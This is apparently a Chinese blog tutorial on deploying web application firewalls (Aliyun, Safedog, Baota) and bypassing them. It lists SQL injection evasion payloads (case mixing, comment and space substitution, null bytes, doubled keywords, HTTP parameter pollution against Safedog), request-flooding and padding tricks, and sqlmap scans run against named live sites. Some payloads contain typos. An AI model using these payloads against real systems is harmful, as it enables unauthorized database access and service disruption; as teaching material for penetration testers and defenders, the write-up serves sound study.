目录

一、WAF部署：

1.1、阿里云盾

1.2、安全狗：

1.3、宝塔面板：

下载地址：

桌面应用端

web网页端

二、WAF绕过

2.1、原理：

2.2、介绍：

2.3、WAF分为非嵌入型WAF和嵌入型WAF

三、WAF的判断

方法一：手动测试

方法二：sqlmap进行测试

四、超过WAF配额绕过：

4.1、原理：

方法一：增加参数个数

方法二：增加参数长度

方法三：增加WAF负载

五、构造异常数据包

5.1、双参数绕过：

5.2、请求方式转换：

5.3、绕过匹配规则：

大小写变换：

常用字符替换：

过滤关键字

使用嵌套：

双重编码：

特殊符号：

http 参数污染

---

一、WAF部署：

常见的有阿里云盾、安全狗、宝塔面板

1.1、阿里云盾

购买云服务器 ECS 即可免费使用云盾的基础功能，为中小网站提供如安全漏洞检测、网页木马检测以及面向云服务器用户提供的主机入侵检测、防DDOS等一站式安全服务

1.2、安全狗：

下载地址：

免费服务器安全软件_服务器网站安全狗-安全狗 (safedog.cn)http://free.safedog.cn/

安装教程（可能出现的错误）：

安全狗详细安装、遇见无此服务器解决、在windows中命令提示符中进入查看指定文件夹手动启动Apache_黑色地带(崛起)的博客-CSDN博客https://blog.csdn.net/qq_53079406/article/details/123148183?spm=1001.2014.3001.5501

一体化防御：包括网络层、网站应用层、系统层防御。

网站安全狗、服务器安全狗、安全狗服云

1.3、宝塔面板：

下载地址：

​​​​​​宝塔面板 - 简单好用的Linux/Windows服务器运维管理面板宝塔，让运维简单高效。面板支持Linux与Windows系统。一键配置：LAMP/LNMP、网站、数据库、FTP、SSL，通过Web端轻松管理服务器。https://www.bt.cn/

桌面应用端

传统的软件端操作界面，可以对服务器的站点进行高效的管理

高效的操作管理，可快速搭建站点、数据库、FTP等服务

web网页端

相对于桌面应用端有更好的体验，跨终端、跨平台

高效的操作管理，可快速搭建站点、数据库、FTP等服务

完善的在线文件管理器，轻松实现图片查看，文本编辑，文件打包解压

---

---

二、WAF绕过

2.1、原理：

WAF(Web Application Firewall) 可以屏蔽常见的网站漏洞攻击，如SQL注入，XML注入、XSS等。WAF针对的是应用层而非网络层的入侵。其难点是对入侵的检测能力，尤其是对Web服务入侵的检测，WAF最大的挑战是识别率。对于已知的攻击方式，可以谈识别率，但是对于未知的攻击手段，WAF是检测不到的

大多数的WAF都是基于规则的WAF，对接数据收到的包进行正则匹配过滤，如果正则匹配到与现有漏洞知识库的攻击代码相同，则认为这个恶意代码并进行阻断。对于基于规则匹配的WAF，每天都需要及时更新最新的漏洞库。

只有在 WAF解析HTTP请求 或 WAF匹配规则 两个地方进行绕过。

第三、四步是WAF匹配到攻击之后的操作，这时候WAF已经检测到攻击了

1. 解析http请求：协议解析模块
2. 匹配规则：规则检测模块，匹配规则库
3. 防御动作：return 403 或者跳转到自定义界面，或者不返回任何数据，或者拉黑IP
4. 日志记录：记录到elk中

2.2、介绍：

在实际的渗透测试过程中，经常会碰到网站存在WAF的情况。网站存在WAF，意味着我们不能使用安全工具对网站进行测试，因为一旦触碰了WAF的规则，轻则丢弃报文，重则拉黑IP。所以，我们需要手动进行WAF的绕过，而绕过WAF前肯定需要对WAF 的工作原理有一定的理解

2.3、WAF分为非嵌入型WAF和嵌入型WAF

非嵌入型WAF指的是硬件型WAF、云WAF、软件型WAF之类的；而嵌入型WAF指的是网站内置的WAF。非嵌入型WAF对Web流量的解析完全是靠自身的，而嵌入型WAF拿到的Web数据是已经被解析加工好的。所以非嵌入型的受攻击机面还涉及到其他层面，而嵌入型WAF从Web容器模块型WAF、代码层WAF往下走，其对抗畸形报文、扫操作绕过的能力越来越强。当然，在部署维护成本方面，也是越高的。

---

---

三、WAF的判断

方法一：手动测试

①最简单的SQL语句

and 1=1

and 1=2

②在域名后加上一个不存在的id参数，并且加上明显sql注入语句，查看服务器回显

---

方法二：sqlmap进行测试

sqlmap -u 'http://www.xxxxx.com/index.html' --batch --random-agent

random-agent 是通过/usr/share/sqlmap/txt/user-agents.txt字典随机生成一个user-agent

对于这个网站我没检测出来是什么离大谱了

sqlmap -u 'http://www.shmds.com/index.html' --batch --random-agent --forms --crawl=2

还是没测出来，但是被拉黑了，说明是有waf

---

---

四、超过WAF配额绕过：

4.1、原理：

为不干扰到网站的正常运行，配置WAF检测额度内进行过滤，有些WAF就会设置如果数据包长度超过所检测的长度，就会对部分数据包或者是数据包的部分内容进行无检测“放行”。

方法一：增加参数个数

配置的原因，例如safedog，只会检测前100个参数，把自己的执行语句放在100个之后

方法二：增加参数长度

文件上传漏洞利用时，增加无意义数据，webshell放在最后面；SQL注入时，增加URL编码长度，并注释掉；xss测试时加入无意义内容

方法三：增加WAF负载

向WAF发送大量正常数据包，并发送异常数据包，导致站点流量过大，可能会对部分数据包进行检查，注意分寸，避免造成宕机。

---

---

五、构造异常数据包

5.1、双参数绕过：

网站有1个id参数，在数据包中包含2个id参数进去，waf可能只检查第一个，第二个就被服务器执行了。

5.2、请求方式转换：

根据对WAF配置的不同

如果WAF只检验GET类型的包，忽略POST类型的包，修改数据包类型尝试绕过

如果WAF只检验POST类型的包，忽略GET类型的包，修改数据包类型尝试绕过

有时，也可尝试，把数据包改为request类型等或根本就不存在的其他类型

5.3、绕过匹配规则：

---

大小写变换：

?id=-1' UnIOn SeLEct  1,VERsion(),3

---

常用字符替换：

greatest 替换 >

greatest返回两个值中大的那个

?id=-1' union select greatest(ascii(substr(database(),0,1)),1) --+

substr(string,b,c)-------->截取字符串string，从第b个开始，截取c个

least  替换 <

least返回两个值中小的那个

?id=-1' union select least(ascii(substr(database(),0,1)),1000000) --+

strcmp函数

比较两个值大小，相等返回0 后者比前者大返回-1 小返回1

?id=-1' union select srtcmp(ascii(substr(database(),0,1)),100) --+

in 替换 =

相等返回1 不相等返回 0

?id=-1' union select substr(database()) in ("u") --+

between and 替换 =

?id=-1' union select substr(database()) between "a" and "u" --+

form for

盲注过滤逗号

?id=-1' union select(database() form 0 for 1) --+

limit A offset B

当过滤逗号时,limit 后面只能有一个参数，表示要取的数量，offset 表示跳过数量

select * from users limit 3 offset 2

表示跳过前2个，取3个，即3，4，5

benchmark替换sleep

benchmark来测速，即执行select database() 5000次所需时间

benchmark(5000,(select database()))

hex() bin() 替换 ascii()

hex(substr(database(),0,1))=55

concat_ws替换group_concat

concat_ws(",",database(),version())

---

过滤关键字

即过滤如select、or、from等的关键字。有些在过滤时没有进行递归过滤，而且刚好将关键字替换为空。这时候，我们可以使用穿插关键字的方法进行绕过操作

---

使用嵌套：

对某些关键字替换为空，尝试采用嵌套双写进行绕过

SELselectECT、UNunionION

---

双重编码：

WAF会解码后过滤

---

特殊符号：

+(-)(@)(!)等替代空格

select+database()

select@database()

xor逻辑异或

任意一个数为NULL时,返回NULL

非NULL的数,逻辑真假值相异，返回1，否则为0

database()="admin" xor 0

/**/  ()  %0a  ``  2个空格 替代 空格

select/**/database()

替换and or not xor

and ----> &&    ,or ------> ||  ,xor ------> |     ,not ----->  !

替换=

like   rlike

where id rlike 1

where id like "admin"

union all select

select password from users where id rlike 1 union all select version();

版本结合

版本小于50014

select  /*!版本号(如50014) database()*/

注释符加换行绕过

select #a database()

selelct %23%0a database()

(%23表示注释   %0a表示换行)

空字节 

有的过滤会碰到空字节会中止过滤

?id=1 a%00nd 1=2……

?id=1 %00 and 1=2……

---

http 参数污染

利用参数污染来导致网站和安全狗接受数据的不一致性，实现绕过的操作。当get方式进行传参时，经过&符号传入多个参数，WAF可能只检测第一个参数的值，然后台却检测最后一个传入的值，此时能够绕过WAF的防护

下图即每种服务器获得到的参数

?id=1/**&id=-1' union select 1,database(),3 #*/

安全狗收到的：  1/**&id=-1' union select 1,database(),3 #*/

被注释，没法执行，安全狗会忽略

网站收到的：  -1' union select 1,database(),3 #*/

被带入执行

（18）【WAF绕过】WAF部署、绕过分析和原理、注入绕过WAF方法相关推荐

1. sql注入关于waf的绕过

   sql注入关于waf的绕过 关于Waf绕过可大致分为三类: 一.白盒绕过 二.黑盒绕过 1.架构层面绕过waf 1.1.寻找源网站绕过waf检测 1.2.通过同网段绕过waf防护 2.资源限制角度绕过 ...

2. 43_sql注入绕waf

   sql注入绕waf 一.搭建安全狗 参考文章 https://www.cnblogs.com/zhaoyunxiang/archive/2021/09/27/15342257.html 搭建之后,通过 ...

3. 深入理解SQL注入绕过WAF和过滤机制

   知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

4. 深入理解SQL注入绕过WAF与过滤机制

   知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

5. waf怎么读_技术分享：杂谈如何绕过WAF（Web应用防火墙）

   ‍‍0x01开场白 ‍‍‍‍这个议题呢,主要是教大家一个思路,而不是把现成准备好的代码放给大家. ‍‍可能在大家眼中WAF(Web应用防火墙)就是"不要脸"的代名词.如果没有他,我 ...

6. WAF原理及绕过（成功绕过某狗）

   绕过截图 测试网站sqli-labs/Less-11,hackbar被拦截,burp成功绕过报错 原理解析 参考链接: https://blog.csdn.net/qq_36119192/articl ...

7. Mysql注入绕过WAF总结

   Mysql注入绕过WAF总结 过滤等于号 select * from user where id = 2; select * from user where id like 2; select * f ...

8. SQL注入和WAF绕过总结姿势

   自己复习专用,大佬勿喷 文章目录 前言 一.注入手法 联合注入 报错注入 布尔盲注 延时注入 堆叠注入 二.绕过姿势 绕过空格 注释符 括号 引号绕过(使用十六进制) 逗号绕过(使用from或者off ...

9. WAF基本原理与部署方式

   WAF介绍 WAF是什么? WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF. 国际上公认的一种说法是:Web应用防火墙是通过执行一系列针对HTTP/H ...

10. 360护心镜脚本分析及N种绕过方式

    0x00 初识"护心镜" 官方介绍: 通过Hook XSS的常用函数,并监控DOM元素的创建,从而对整个页面的js行为进行监控.当发现页面中存在XSS攻击行为时,可根据预置的选项, ...

最新文章

1. QIIME 2教程. 30补充资源SupplementaryResources(2020.11)
2. 博客园出现了奇怪的cookie问题
3. 论文笔记：MTCNN
4. springboot（2.2.4）的默认日志框架logback换成log4j2
5. 图像处理常用边缘检测算子总结
6. laravel-admin 开发 bootstrap-treeview 扩展包
7. 面试精讲之面试考点及大厂真题 - 分布式专栏 08 Redis中有哪些数据结构及底层实现原理
8. 异步任务利器Celery(一)介绍
9. [转载]网页栅格系统研究（1）：960的秘密
10. 计算机的各种配件知识,菜鸟必读：DIY装机需要知道的一些配件小知识
11. K3CLOUD 常用数据表
12. Arduino与Proteus仿真实例-TB6612FNG驱动直流电机仿真
13. 笔记本 GTX1050ti 安装win10 Ubuntu18.04 显卡问题
14. hexo添加文章更新时间
15. diy公益拍卖会 杨宗纬吴尊林俊杰s.h.e等拼人气
16. 向日葵的约定（歌词中日对译）
17. 怎么用python启动谷歌浏览器_Selenium 基于python 安装以及配置谷歌浏览器启动
18. ANSYS Electronics Suite 2021 R2
19. i7 13700k和i7 12700k差距
20. 电子商务平台到底是什么？这就告诉你！

热门文章

1. 'IOKING' TCP Transmission Server Engine ('云猴'©TCP通讯服务器引擎)（预告版）
2. 数据集Advertising.csv——分析出广告媒体投入与销售额之间的关系
3. FQDN與DNS了解
4. for循环的遍历的三种方式
5. Android 资源大全中文版
6. “外卖时代”小麦歌全降解生态餐盒 造福产业各方
7. 区块链社交“无社交” |链捕手
8. css如何设置文字阴影？
9. 两万字详解Java异常，面试再也不怕被问到
10. 苹果IOS应用上架遇到的问题及处理方法记录